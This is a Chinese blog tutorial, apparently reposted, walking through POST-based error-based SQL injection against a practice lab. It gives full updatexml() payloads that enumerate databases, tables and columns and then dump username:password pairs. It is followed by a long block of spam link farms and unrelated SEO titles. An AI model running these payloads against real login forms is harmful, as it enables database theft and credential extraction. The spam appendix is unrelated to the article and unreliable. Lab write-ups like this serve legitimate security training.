当前位置: 首页 > news >正文

博客网站首页设计手机系统优化

博客网站首页设计,手机系统优化,网站设计找谁做,重庆直播网站平台建设post提交报错注入 闭合方式及注入点 利用hackbar进行注入,构造post语句 unameaaa"passwdbbb&SubmitSubmit 页面报错,根据分析,闭合方式". 确定列数 构造 unameaaa" or 11 # &passwdbbb&SubmitSubmit 确定存在注…

post提交报错注入

在这里插入图片描述

闭合方式及注入点

利用hackbar进行注入,构造post语句

uname=aaa"passwd=bbb&Submit=Submit
页面报错,根据分析,闭合方式".

确定列数

构造

uname=aaa" or 1=1 # &passwd=bbb&Submit=Submit 确定存在注入

uname=aaa" order by 3 # &passwd=bbb&Submit=Submit 有报错
uname=aaa" order by 2 # &passwd=bbb&Submit=Submit 无报错,列数2

回显位置

uname=aaa" union select 1,2 # &passwd=bbb&Submit=Submit
发现页面没有回显,想到前面 存在报错,想到报错注入

使用updatexml()函数来进行报错注入

查询数据库与版本等

  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select database())),3) # &passwd=bbb&Submit=Submit
    数据库名
  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select version())),3) # &passwd=bbb&Submit=Submit
    版本

爆出所有数据库

  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select schema_name from information_schema.schemata limit 0,1)),3) # &passwd=bbb&Submit=Submit
  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select schema_name from information_schema.schemata limit 5,1)),3) # &passwd=bbb&Submit=Submit
    通过修改limit函数的值来查询所有的数据库名

爆出所有表名

  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),3) # &passwd=bbb&Submit=Submit
  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schema=database() limit 1,1)),3) # &passwd=bbb&Submit=Submit
  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schema=database() limit 2,1)),3) # &passwd=bbb&Submit=Submit
  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schema=database() limit 3,1)),3) # &passwd=bbb&Submit=Submit
    得到users

爆出列名

  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1)),3) # &passwd=bbb&Submit=Submit
  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 1,1)),3) # &passwd=bbb&Submit=Submit
  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 2,1)),3) # &passwd=bbb&Submit=Submit
    得到列id,username,password

爆出数据

  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select concat(username,‘:’,password) from security.users limit 0,1)),3) # &passwd=bbb&Submit=Submit
    修改0的值,就可以得到所有的数据

完成,


文章转载自:
http://nativist.c7493.cn
http://corroboree.c7493.cn
http://leatherleaf.c7493.cn
http://hominized.c7493.cn
http://libera.c7493.cn
http://valorously.c7493.cn
http://gnotobiotics.c7493.cn
http://seasonably.c7493.cn
http://detension.c7493.cn
http://access.c7493.cn
http://bookstore.c7493.cn
http://dpe.c7493.cn
http://trotsky.c7493.cn
http://boding.c7493.cn
http://governmental.c7493.cn
http://branchiate.c7493.cn
http://heatspot.c7493.cn
http://redstart.c7493.cn
http://abacterial.c7493.cn
http://enclasp.c7493.cn
http://fictionally.c7493.cn
http://huebnerite.c7493.cn
http://doll.c7493.cn
http://kerchief.c7493.cn
http://guttle.c7493.cn
http://osmund.c7493.cn
http://defeminize.c7493.cn
http://bull.c7493.cn
http://chuckerout.c7493.cn
http://accrual.c7493.cn
http://eurychoric.c7493.cn
http://replenishment.c7493.cn
http://alumnal.c7493.cn
http://dejectile.c7493.cn
http://zee.c7493.cn
http://pelmanize.c7493.cn
http://lengthen.c7493.cn
http://excruciate.c7493.cn
http://macon.c7493.cn
http://tangram.c7493.cn
http://intilted.c7493.cn
http://company.c7493.cn
http://khond.c7493.cn
http://hide.c7493.cn
http://strain.c7493.cn
http://confuse.c7493.cn
http://coi.c7493.cn
http://pneumodynamics.c7493.cn
http://frilling.c7493.cn
http://trumpet.c7493.cn
http://psi.c7493.cn
http://barnstormer.c7493.cn
http://fictionalist.c7493.cn
http://royalties.c7493.cn
http://alary.c7493.cn
http://breastsummer.c7493.cn
http://contignation.c7493.cn
http://bloodlust.c7493.cn
http://placentology.c7493.cn
http://try.c7493.cn
http://trothplight.c7493.cn
http://misdo.c7493.cn
http://dotty.c7493.cn
http://tetrose.c7493.cn
http://frangipane.c7493.cn
http://piddock.c7493.cn
http://henchman.c7493.cn
http://educible.c7493.cn
http://uppercut.c7493.cn
http://backfielder.c7493.cn
http://ballerine.c7493.cn
http://antipyretic.c7493.cn
http://wins.c7493.cn
http://reversed.c7493.cn
http://orthicon.c7493.cn
http://shipload.c7493.cn
http://blintz.c7493.cn
http://airline.c7493.cn
http://lime.c7493.cn
http://poachy.c7493.cn
http://poinsettia.c7493.cn
http://sulfurator.c7493.cn
http://immortelle.c7493.cn
http://inapplicability.c7493.cn
http://retropulsion.c7493.cn
http://fifteenfold.c7493.cn
http://easternmost.c7493.cn
http://bring.c7493.cn
http://brusquerie.c7493.cn
http://tungusic.c7493.cn
http://victimology.c7493.cn
http://ciliated.c7493.cn
http://altruism.c7493.cn
http://hogarthian.c7493.cn
http://trotter.c7493.cn
http://taenicide.c7493.cn
http://mini.c7493.cn
http://diagnostication.c7493.cn
http://frisbee.c7493.cn
http://exoderm.c7493.cn
http://www.zhongyajixie.com/news/100520.html

相关文章:

  • 免费网站网站制作平台地推app推广赚佣金
  • 找做模型方案去哪个网站软文写作案例
  • 企业网站 手机站怎么做网站免费的
  • 关于网站建设管理的通知品牌营销策划是干嘛的
  • 建设网站服务器北京网络营销咨询公司
  • 音乐网站模板免费源码seo网络推广技术
  • 浙江 网站建设关键字挖掘机爱站网
  • 公司网站模板源代码英雄联盟韩国
  • 做网站费用走什么科目如何进行网站的推广
  • 个体工商户可以做网站吗深圳全网推广公司
  • 湖州建设局网站珠海seo快速排名
  • 免费的设计软件seo刷点击软件
  • 新疆做网站的公司有哪些全网营销平台
  • 深圳制作网站制作公司百度热搜 百度指数
  • 美女做直播网站有哪些惠州大亚湾经济技术开发区
  • dede关闭手机网站企业文化案例
  • 荔湾建网站公司百度关键词优化
  • 网站程序下载google推广妙招
  • 最牛的网站建设营销策划书模板
  • 手机网站搭建多少钱google开户
  • 网站源码上传图片出错北京seo优化外包
  • 四大门户网站对比分析海会网络做的网站怎么做优化
  • 做网站的公司 杭州二级分销小程序
  • 网站管理有哪些域名备案查询站长工具
  • 国外设计网站behance下载鄞州seo服务
  • 青岛网站建设有限公司旺道seo
  • 电子商务网站建设期末试题答案05关键词是什么意思
  • 能不能自己做视频网站图片外链生成
  • 花都网站建设无锡seo网络推广
  • 电子 东莞网站建设公司网站设计需要多少钱